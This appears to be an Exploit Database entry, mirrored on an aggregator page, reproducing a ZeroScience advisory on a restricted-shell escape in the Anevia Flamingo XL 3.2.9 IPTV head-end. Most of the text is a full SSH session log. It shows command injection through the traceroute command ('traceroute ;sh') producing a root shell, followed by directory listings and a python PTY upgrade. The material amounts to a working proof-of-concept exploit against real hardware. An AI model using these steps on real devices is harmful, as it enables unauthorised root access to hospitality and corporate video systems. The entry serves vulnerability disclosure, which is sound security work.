Anevia Flamingo XL 3.2.9 – Remote Root Jailbreak

• Exploit Database
• 121 阅读

• 作者： LiquidWorm
  日期： 2023-06-14
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51516/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199

  Exploit Title: Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak Exploit Author: LiquidWorm Product web page: https://www.ateme.com Affected version: 3.2.9 Hardware revision 1.0 SoapLive 2.0.3   Summary: Flamingo XL, a new modular and high-density IPTV head-end product for hospitality and corporate markets. Flamingo XL captures live TV and radio content from satellite, cable, digital terrestrial and analog sources before streaming it over IP networks to STBs, PCs or other IP-connected devices. The Flamingo XL is based upon a modular 4U rack hardware platform that allows hospitality and corporate video service providers to deliver a mix of channels from various sources over internal IP networks.   Desc: Once the admin establishes a secure shell session, she gets dropped into a sandboxed environment using the login binary that allows specific set of commands. One of those commands that can be exploited to escape the jailed shell is traceroute. A remote attacker can breakout of the restricted environment and have full root access to the device.   Tested on: GNU/Linux 3.1.4 (x86_64) Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6     Vulnerability discovered by Gjoko &apos;LiquidWorm&apos; Krstic @zeroscience     Advisory ID: ZSL-2023-5780 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5780.php     13.04.2023   --     $ ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 root@192.168.1.1 The authenticity of host &apos;192.168.1.1 (192.168.1.1)&apos; can&apos;t be established. RSA key fingerprint is SHA256:E6TaDYkszZMbS555THYEPVzv1DpzYrwJzW1TM4+ZSLk. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added &apos;192.168.1.1&apos; (RSA) to the list of known hosts. Anevia Flamingo XL root@192.168.1.1&apos;s password: Primary-XL> help available commands: bonding config date dns enable ethconfig exit exp firewall help hostname http igmpq imp ipconfig license log mail passwd persistent_logs ping reboot reset route serial settings sslconfig tcpdump timezone traceroute upgrade uptime version vlanconfig   Primary-XL> tcpdump ;id tcpdump: illegal token: ; Primary-XL> id unknown command id Primary-XL> whoami unknown command whoami Primary-XL> ping ;id ping: ;id: Host name lookup failure Primary-XL> traceroute ;id BusyBox v1.1.2p2 (2012.04.24-09:33+0000) multi-call binary   Usage: traceroute [-FIldnrv] [-f 1st_ttl] [-m max_ttl] [-p port#] [-q nqueries] [-s src_addr] [-t tos] [-w wait] [-g gateway] [-i iface] [-z pausemsecs] host [data size]   trace the route ip packets follow going to "host" Options: -FSet the don&apos;t fragment bit -IUse ICMP ECHO instead of UDP datagrams -lDisplay the ttl value of the returned packet -dSet SO_DEBUG options to socket -nPrint hop addresses numerically rather than symbolically -rBypass the normal routing tables and send directly to a host -vVerbose output -m max_ttlSet the max time-to-live (max number of hops) -p port#Set the base UDP port number used in probes (default is 33434) -q nqueries Set the number of probes per <code></code>ttl&apos;&apos; to nqueries (default is 3) -s src_addr Use the following IP address as the source address -t tosSet the type-of-service in probe packets to the following value (default 0) -w wait Set the time (in seconds) to wait for a response to a probe (default 3 sec) -gSpecify a loose source route gateway (8 maximum)   uid=0(root) gid=0(root) groups=0(root) Primary-XL> version Software Revision: Anevia Flamingo XL v3.2.9 Hardware Revision: 1.0 (c) Anevia 2003-2012 Primary-XL> traceroute ;sh ... ... whoami root id uid=0(root) gid=0(root) groups=0(root) ls -al drwxr-xr-x 19 root root 1024 Oct32022 . drwxr-xr-x 19 root root 1024 Oct32022 .. drwxr-xr-x2 root root 1024 Oct 212013 bin drwxrwxrwt2 root root 40 Oct32022 cores drwxr-xr-x 13 root root27648 May 22 00:53 dev drwxr-xr-x3 root root 1024 Oct 212013 emul drwxr-xr-x 48 1000 1000 3072 Oct32022 etc drwxr-xr-x3 root root 1024 Oct32022 home drwxr-xr-x 11 root root 3072 Oct 212013 lib lrwxrwxrwx1 root root 20 Oct 212013 lib32 -> /emul/ia32-linux/lib lrwxrwxrwx1 root root3 Oct 212013 lib64 -> lib drwx------2 root root12288 Oct 212013 lost+found drwxr-xr-x4 root root 1024 Oct 212013 mnt drwxrwxrwt2 root root 80 May 22 00:45 php_sessions dr-xr-xr-x177 root root0 Oct32022 proc drwxr-xr-x4 root root 1024 Oct 212013 root drwxr-xr-x2 root root 2048 Oct 212013 sbin drwxr-xr-x 12 root root0 Oct32022 sys drwxrwxrwt 26 root root 1140 May 22 01:06 tmp drwxr-xr-x 10 1000 1000 1024 Oct 212013 usr drwxr-xr-x 14 root root 1024 Oct 212013 var   ls /var/www/admin _img configuration.phplog_securemedia.phpstream_dump.php _langcores_and_logs_management.phplogin.phpstream_services _lib dataminer_handshake.phplogout.php streaming.php _style dvbt.php logs.php support.php about.phpdvbt_scan.phpmain.php template ajax export.php manager.phptime.php alarm.phpfileprogress.php network.phptoto.ts alarm_view.php firewall.php pear upload_helper.php authentication.php get_config power.phpuptime.php bridges.phpget_enquiry_pending.phpread_settings.phpusbloader.php cam.phpget_upgrade_error.phpreceive_helper.php version.php channel.phpheartbeat.phprescrambling webradio.php channel_xl_list.phpincluderescrambling.php webtv check_stateinput.phpresilience webtv.php classjs resilience.php xmltv.php common license.phprestart_service.php config_snmp.phplog.phpset_oem.php   python -c &apos;import pty; pty.spawn("/bin/bash")&apos; root@Primary-XL:/# cd /usr/local/bin root@Primary-XL:/usr/local/bin# ls -al login -rwxr-xr-x1 root root35896 Feb 212012 login root@Primary-XL:/usr/local/bin# cd .. root@Primary-XL:/usr/local# ls commands/ bondingfirewall mail timezone config help passwd traceroute date hostname persistent_logsupgrade dbg-serial http ping uptime dbg-set-oemigmpqrouteversion dbg-updates-logimpserial vlanconfig dnsipconfig settings ethconfiglicensesslconfig explogtcpdump root@Primary-XL:/usr/local# exit exit Primary-XL> enable password: Primary-XL# ;]